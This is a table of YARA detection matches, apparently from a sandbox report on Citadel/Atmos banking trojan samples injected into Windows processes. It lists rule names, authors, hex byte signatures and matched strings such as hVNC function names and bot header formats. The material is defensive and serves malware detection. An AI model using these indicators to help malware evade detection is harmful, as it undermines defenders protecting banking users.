5.3.ctfmon.exe.a50000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 A5 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 A5 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 A5 00
5.3.ctfmon.exe.a50000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
40.0.XRdxSzSUL8yOL.exe.2390000.1.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
40.0.XRdxSzSUL8yOL.exe.2390000.1.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
15.0.smartscreen.exe.290000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
7.0.svchost.exe.d40000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
40.0.XRdxSzSUL8yOL.exe.2390000.1.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
40.0.XRdxSzSUL8yOL.exe.2390000.1.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
14.3.RuntimeBroker.exe.ab0000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
14.3.RuntimeBroker.exe.ab0000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 AB 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 AB 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 AB 00
14.3.RuntimeBroker.exe.ab0000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
41.2.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
7.0.svchost.exe.d40000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
2.0.sihost.exe.ac0000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
15.0.smartscreen.exe.290000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
15.0.smartscreen.exe.290000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 29 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 29 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 29 00
15.0.smartscreen.exe.290000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
41.2.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
7.0.svchost.exe.d40000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
41.2.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
41.2.XRdxSzSUL8yOL.exe.2c90000.1.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
32.2.XRdxSzSUL8yOL.exe.2530000.1.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
32.2.XRdxSzSUL8yOL.exe.2530000.1.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
2.0.sihost.exe.ac0000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
2.0.sihost.exe.ac0000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 AC 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 AC 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 AC 00
2.0.sihost.exe.ac0000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
7.0.svchost.exe.d40000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 D4 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 D4 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 D4 00
7.0.svchost.exe.d40000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
32.2.XRdxSzSUL8yOL.exe.2530000.1.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
32.2.XRdxSzSUL8yOL.exe.2530000.1.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
29.3.RuntimeBroker.exe.ee0000.0.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
29.3.RuntimeBroker.exe.ee0000.0.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
29.3.RuntimeBroker.exe.ee0000.0.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
29.3.RuntimeBroker.exe.ee0000.0.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 EE 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 EE 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 EE 00
29.3.RuntimeBroker.exe.ee0000.0.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
37.0.XRdxSzSUL8yOL.exe.c90000.1.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
37.0.XRdxSzSUL8yOL.exe.c90000.1.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
37.0.XRdxSzSUL8yOL.exe.c90000.1.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
37.0.XRdxSzSUL8yOL.exe.c90000.1.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x1227f:$MZ: 4D 5A 0x123c7:$MZ: 4D 5A 0x153bd:$MZ: 4D 5A 0x1f634:$MZ: 4D 5A 0x1f674:$MZ: 4D 5A 0x3f208:$MZ: 4D 5A 0x3e8d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 C9 00 57 33 DB BF 00 28 00 00 0x3e978:$b: 68 C8 00 00 00 FF 15 4C 12 C9 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x2f820:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x2f840:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3e727:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 C9 00
37.0.XRdxSzSUL8yOL.exe.c90000.1.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
7.3.svchost.exe.d40000.0.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
7.3.svchost.exe.d40000.0.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
7.3.svchost.exe.d40000.0.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
7.3.svchost.exe.d40000.0.raw.unpack	Atmos_Packed_Malware	Second Generic Spyware.Citadel.Atmos signture when builder add a packed layer	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x12e7f:$MZ: 4D 5A 0x12fc7:$MZ: 4D 5A 0x15fbd:$MZ: 4D 5A 0x20234:$MZ: 4D 5A 0x20274:$MZ: 4D 5A 0x40808:$MZ: 4D 5A 0x3f4d4:$a: 55 8B EC 83 EC 0C 53 56 8B 35 48 11 D4 00 57 33 DB BF 00 28 00 00 0x3f578:$b: 68 C8 00 00 00 FF 15 4C 12 D4 00 E9 62 FF FF FF E8 69 10 FE FF 5F 5E 5B C9 C3 0x30420:$c: 53 68 65 6C 6C 45 78 65 63 75 74 65 45 78 57 00 53 48 45 4C 4C 33 32 2E 64 6C 6C 00 1E 00 47 65 0x30440:$d: 74 55 73 65 72 4E 61 6D 65 45 78 57 00 00 53 65 63 75 72 33 32 2E 64 6C 6C 00 10 00 0x3f327:$e: 55 8B EC 83 E4 F8 83 EC 1C 83 7D 08 00 57 74 5F 6A FF FF 75 08 FF 15 98 12 D4 00
7.3.svchost.exe.d40000.0.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
38.0.XRdxSzSUL8yOL.exe.2f50000.1.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
38.0.XRdxSzSUL8yOL.exe.2f50000.1.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
38.0.XRdxSzSUL8yOL.exe.2f50000.1.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x53b8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x53f8:$TS1: X-TS-Rule-Name: %s 0x5420:$TS2: X-TS-Rule-PatternID: %u 0x5450:$TS3: X-TS-BotID: %s 0x5470:$TS4: X-TS-Domain: %s 0x5490:$TS5: X-TS-SessionID: %s 0x5558:$TS6: X-TS-Header-Cookie: %S 0x5588:$TS7: X-TS-Header-Referer: %S 0x55b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x55f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x5638:$TS10: X-TS-Header-UserAgent: %S 0x52e0:$VNC1: _hvnc_init@4 0x52f0:$VNC2: _hvnc_uninit@0 0x5300:$VNC3: _hvnc_start@8 0x5310:$VNC4: _hvnc_stop@0 0x5320:$VNC5: _hvnc_wait@0 0x5330:$VNC6: _hvnc_work@0 0x7efc:$WB1: nspr4.dll 0x8ee0:$WB2: nss3.dll 0x8ef4:$WB3: chrome.dll
38.0.XRdxSzSUL8yOL.exe.2f50000.1.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9148:$c: %BOTID% 0x9150:$d: %BOTNET% 0x9264:$f: bc_remove 0x9270:$g: bc_add 0x7f68:$ggurl: http://www.google.com/webhp
36.0.XRdxSzSUL8yOL.exe.2ca0000.1.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
36.0.XRdxSzSUL8yOL.exe.2ca0000.1.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
36.0.XRdxSzSUL8yOL.exe.2ca0000.1.raw.unpack	Atmos_Malware	Generic Spyware.Citadel.Atmos Signature	xylitol@temari.fr	0x0:$MZ: 4D 5A 0x5fb8:$LKEY: 533D9226E4C1CE0A9815DBEB19235AE4 0x5ff8:$TS1: X-TS-Rule-Name: %s 0x6020:$TS2: X-TS-Rule-PatternID: %u 0x6050:$TS3: X-TS-BotID: %s 0x6070:$TS4: X-TS-Domain: %s 0x6090:$TS5: X-TS-SessionID: %s 0x6158:$TS6: X-TS-Header-Cookie: %S 0x6188:$TS7: X-TS-Header-Referer: %S 0x61b8:$TS8: X-TS-Header-AcceptEncoding: %S 0x61f8:$TS9: X-TS-Header-AcceptLanguage: %S 0x6238:$TS10: X-TS-Header-UserAgent: %S 0x5ee0:$VNC1: _hvnc_init@4 0x5ef0:$VNC2: _hvnc_uninit@0 0x5f00:$VNC3: _hvnc_start@8 0x5f10:$VNC4: _hvnc_stop@0 0x5f20:$VNC5: _hvnc_wait@0 0x5f30:$VNC6: _hvnc_work@0 0x8afc:$WB1: nspr4.dll 0x9ae0:$WB2: nss3.dll 0x9af4:$WB3: chrome.dll
36.0.XRdxSzSUL8yOL.exe.2ca0000.1.raw.unpack	citadel13xy	Citadel 1.5.x.y trojan banker	Jean-Philippe Teissier / @Jipe_	0x9d48:$c: %BOTID% 0x9d50:$d: %BOTNET% 0x9e64:$f: bc_remove 0x9e70:$g: bc_add 0x8b68:$ggurl: http://www.google.com/webhp
34.2.XRdxSzSUL8yOL.exe.2400000.1.raw.unpack	JoeSecurity_Citadel	Yara detected Citadel	Joe Security
34.2.XRdxSzSUL8yOL.exe.2400000.1.raw.unpack	JoeSecurity_Atmos	Yara detected Atmos Banker	Joe Security
